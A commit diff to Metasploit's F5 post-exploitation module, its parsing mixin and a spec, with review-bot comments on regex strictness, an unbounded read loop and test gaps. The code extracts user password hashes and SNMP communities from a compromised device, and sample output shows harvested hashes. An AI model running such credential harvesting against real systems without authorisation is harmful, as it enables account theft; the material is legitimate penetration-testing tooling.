enhance user data parsing
parent
537be9054d
commit
daa10ea735
|
@ -65,7 +65,9 @@ resource (f5_ssh.rb)> run
|
|||
[+] Saving to /home/h00die/.msf4/loot/20200820143944_default_2.2.2.2_F5.show_net_045166.txt
|
||||
[*] Gathering info from show running-config
|
||||
[+] Saving to /home/h00die/.msf4/loot/20200820143949_default_2.2.2.2_F5.show_running__097351.txt
|
||||
[+] 2.2.2.2:22 Username 'admin' and hash $6$4FAWSZLi$VeSaxPM2/D1JOhMRN/GMkt5wHcbIVKaIC2g765ZD0VA9ZEEm8iyK40/ncGrZIGyJyJF4ivkScNZ59HWAIKMML/
|
||||
[+] 2.2.2.2:22 Username 'admin' with description 'Admin User' and shell tmsh with hash $6$PQvaMmyS$Bn5.2qIin7rC34tHUQ1Vu6fEeuDzQZqc25TSiDsmbB903RENBisWbTN9Mqh7g2x26VUbxdzwUzzmL7fB4T2iy1
|
||||
[+] 2.2.2.2:22 Username 'superlegit' with description 'a user account' and shell tmsh with hash $6$FTQz2reX$U0o37QjQYdg42dwCcLa.1H85hVTriQtxhlMoIM0cs4DFyW5s26kbrEgZG5Mfaxi9fgFfHrvDBGad7ikXnEZIP0
|
||||
[+] 2.2.2.2:22 Username 't' with description 't' and shell none with hash $6$iajXIq2B$ezy4hVW9A.5eN1xG4JZWFbY4bFaq7uUKwO9gDVLxvgzigsX4gquLW1NoSaZP9CtN0NnrbGV4QvtkA.esLJOg50
|
||||
[+] 2.2.2.2:22 SNMP Community 'public' with RO access
|
||||
[+] 2.2.2.2:22 SNMP Community 'rocommunity' with RO access
|
||||
[+] 2.2.2.2:22 SNMP Community 'rwcommunity' with RW access
|
||||
|
|
|
@ -5,13 +5,13 @@ require 'metasploit/framework/hashes/identify'
|
|||
module Msf
|
||||
###
|
||||
#
|
||||
# This module provides methods for working with Arista equipment
|
||||
# This module provides methods for working with F5 equipment
|
||||
#
|
||||
###
|
||||
module Auxiliary::F5
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def f5_config_eater(thost, tport, config)
|
||||
def f5_config_eater(thost, tport, config, store = true)
|
||||
|
||||
credential_data = {
|
||||
address: thost,
|
||||
|
@ -32,7 +32,9 @@ module Msf
|
|||
credential_data[:protocol] = 'udp'
|
||||
end
|
||||
|
||||
store_loot('f5.config', 'text/plain', thost, config.strip, 'config.txt', 'F5 Configuration')
|
||||
if store
|
||||
store_loot('f5.config', 'text/plain', thost, config.strip, 'config.txt', 'F5 Configuration')
|
||||
end
|
||||
|
||||
host_info = {
|
||||
host: thost,
|
||||
|
@ -54,15 +56,17 @@ module Msf
|
|||
# shell none
|
||||
# }
|
||||
|
||||
config.scan(%r{^auth user (.+) \{.+encrypted-password ([$\w/\+]+)}mi).each do |result|
|
||||
config.scan(%r{auth user ([^ ]+) {\s*description "?([^\n"]+)"?\n\s*encrypted-password ([$\w\+\./]+)\n[\w\s\-{}]+\s+shell (tmsh|bash|none)\n}}mi).each do |result|
|
||||
username = result[0].strip
|
||||
hash = result[1].strip
|
||||
description = result[1].strip
|
||||
hash = result[2].strip
|
||||
shell = result[3].strip
|
||||
cred = credential_data.dup
|
||||
cred[:username] = username
|
||||
cred[:jtr_format] = identify_hash(hash)
|
||||
cred[:private_data] = hash
|
||||
create_credential_and_login(cred)
|
||||
print_good("#{thost}:#{tport} Username '#{username}' and hash #{hash}")
|
||||
print_good("#{thost}:#{tport} Username '#{username}' with description '#{description}' and shell #{shell} with hash #{hash}")
|
||||
end
|
||||
|
||||
# generated by: tmsh list sys snmp communities
|
||||
|
@ -123,12 +127,12 @@ module Msf
|
|||
# }
|
||||
|
||||
if /^cm device (?<content>.+)}$/m =~ config
|
||||
if /hostname (?<hostname>[\w\.]+)$/ =~ content
|
||||
if /hostname (?<hostname>[\w\.-]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} Hostname: #{hostname}")
|
||||
host_info[:name] = hostname
|
||||
report_host(host_info)
|
||||
end
|
||||
if /base-mac (?<mac>[\d:a-f]+)$/ =~ content
|
||||
if /base-mac (?<mac>[\d:a-f]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} MAC Address: #{mac}")
|
||||
host_info[:mac] = mac
|
||||
report_host(host_info)
|
||||
|
@ -136,12 +140,12 @@ module Msf
|
|||
if /management-ip (?<ip>[\d\.]+)$/ =~ content
|
||||
print_good("#{thost}:#{tport} Management IP: #{ip}")
|
||||
end
|
||||
if /product (?<product>[\w-]+)$/ =~ content
|
||||
if /product (?<product>[\w-]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} Product #{product}")
|
||||
host_info[:os_name] = "F5 #{product}"
|
||||
report_host(host_info)
|
||||
end
|
||||
if /version (?<version>[\d\.]+)$/ =~ content
|
||||
if /version (?<version>[\d\.]+)$/i =~ content
|
||||
print_good("#{thost}:#{tport} OS Version: #{version}")
|
||||
host_info[:os_flavor] = version
|
||||
report_host(host_info)
|
||||
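Review bot: The new `config.scan` pattern makes the `description` and `shell` lines mandatory, so an `auth user` block with no description, with its fields in another order, or with a shell other than tmsh/bash/none no longer matches, and its hash is silently left out of the results; the old pattern needed only `encrypted-password`. For a configuration audit a missed account matters more than a missing description, so consider making the extra fields optional, e.g. `(?:description "?([^\n"]+)"?\n\s*)?`, and reading them with `result[1].to_s.strip` so a nil capture does not raise. The pattern also lost its leading `^`, so `auth user` can now match in the middle of a line. The enclosing `f5_config_eater` begins and ends outside the hunks shown.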
|
|
|
@ -25,11 +25,14 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def run
|
||||
# Get device prompt
|
||||
prompt = session.shell_command('')
|
||||
unless prompt.include? '(tmos)'
|
||||
prompt = session.shell_command('?')
|
||||
started_tmos = false
|
||||
unless prompt.include? 'Commands:'
|
||||
started_tmos = true
|
||||
print_status('Moving to TMOS prompt')
|
||||
session.shell_command('tmsh')
|
||||
end
|
||||
prompt = session.shell_command('')
|
||||
|
||||
# Get version info
|
||||
system_out = session.shell_command('show /sys version')
|
||||
|
@ -59,7 +62,11 @@ class MetasploitModule < Msf::Post
|
|||
# run additional information gathering
|
||||
|
||||
enum_tmos_configs(prompt)
|
||||
session.shell_command('quit') # exit tmos
|
||||
if started_tmos
|
||||
session.shell_command('quit') # exit tmos
|
||||
else
|
||||
session.shell_command('bash') # go to bash from tmos
|
||||
end
|
||||
enum_configs(prompt)
|
||||
end
|
||||
|
||||
|
@ -107,6 +114,13 @@ class MetasploitModule < Msf::Post
|
|||
if cmd_out.include?('---(less')
|
||||
cmd_out += session.shell_command(" \n" * 20) # 20 pages should be enough
|
||||
end
|
||||
|
||||
# loop to ensure we get all content within the 5 sec window
|
||||
loop do
|
||||
break unless out_tmp = session.shell_read
|
||||
cmd_out << out_tmp
|
||||
end
|
||||
|
||||
print_status("Gathering info from #{command}")
|
||||
cmd_loc = store_loot("F5.#{ec['fn']}",
|
||||
'text/plain',
|
||||
|
@ -115,7 +129,7 @@ class MetasploitModule < Msf::Post
|
|||
"#{ec['fn']}.txt",
|
||||
ec['desc'])
|
||||
vprint_good("Saving to #{cmd_loc}")
|
||||
f5_config_eater(host, port, cmd_out.strip)
|
||||
f5_config_eater(host, port, cmd_out.strip, store=false)
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -168,6 +182,10 @@ class MetasploitModule < Msf::Post
|
|||
command = ec['cmd']
|
||||
cmd_out = session.shell_command(command).gsub(/#{command}|#{prompt}/, '')
|
||||
print_status("Gathering info from #{command}")
|
||||
if cmd_out.include?('No such file or directory') || cmd_out.strip == ''
|
||||
print_error('File not found or empty')
|
||||
next
|
||||
end
|
||||
cmd_loc = store_loot("F5.#{ec['fn']}",
|
||||
'text/plain',
|
||||
session,
|
||||
|
@ -175,7 +193,7 @@ class MetasploitModule < Msf::Post
|
|||
"#{ec['fn']}.txt",
|
||||
ec['desc'])
|
||||
vprint_good("Saving to #{cmd_loc}")
|
||||
f5_config_eater(host, port, cmd_out.strip)
|
||||
f5_config_eater(host, port, cmd_out.strip, store=false)
|
||||
end
|
||||
end
|
||||
end
|
||||
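Review bot: The added `loop do … session.shell_read … end` has no bound of its own: its comment promises a 5 second window, but nothing in the hunk enforces it. A device that keeps producing output would keep the module reading and growing `cmd_out` indefinitely; the same would happen if `shell_read` returned an empty string rather than nil, which is not visible here. A deadline makes the limit explicit, e.g. `deadline = Time.now + 5` followed by `while Time.now < deadline && (out_tmp = session.shell_read)`. Separately, both calls `f5_config_eater(host, port, cmd_out.strip, store=false)` assign a local `store` and pass `false` positionally, which reads like a keyword argument but is not one; plain `false`, or a real `store:` keyword in the mixin, would be clearer. The enclosing methods start and end outside the hunks.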
|
|
|
@ -101,7 +101,7 @@ RSpec.describe Msf::Auxiliary::F5 do
|
|||
data << " }\n"
|
||||
data << " shell none\n"
|
||||
data << '}'
|
||||
expect(aux_f5).to receive(:print_good).with("127.0.0.1:161 Username 'admin' and hash $6$4FAWSZLi$VeSaxPM2/D1JOhMRN/GMkt5wHcbIVKaIC2g765ZD0VA9ZEEm8iyK40/ncGrZIGyJyJF4ivkScNZ59HWAIKMML/")
|
||||
expect(aux_f5).to receive(:print_good).with("127.0.0.1:161 Username 'admin' with description 'Admin User' and shell none with hash $6$4FAWSZLi$VeSaxPM2/D1JOhMRN/GMkt5wHcbIVKaIC2g765ZD0VA9ZEEm8iyK40/ncGrZIGyJyJF4ivkScNZ59HWAIKMML/")
|
||||
expect(aux_f5).to receive(:store_loot).with(
|
||||
'f5.config', 'text/plain', '127.0.0.1', data, 'config.txt', 'F5 Configuration'
|
||||
)
|
||||
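Review bot: The updated expectation in this hunk covers only a user block that has both a description and a `shell` line; nothing visible exercises a block without a description or the new fourth argument of `f5_config_eater`. One example feeding an `auth user` block with no `description` and asserting that the hash is still reported, and one passing `false` as the fourth argument with `expect(aux_f5).not_to receive(:store_loot)`, would pin the two behaviours this commit changes. The surrounding example starts and ends outside the hunk.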
|
|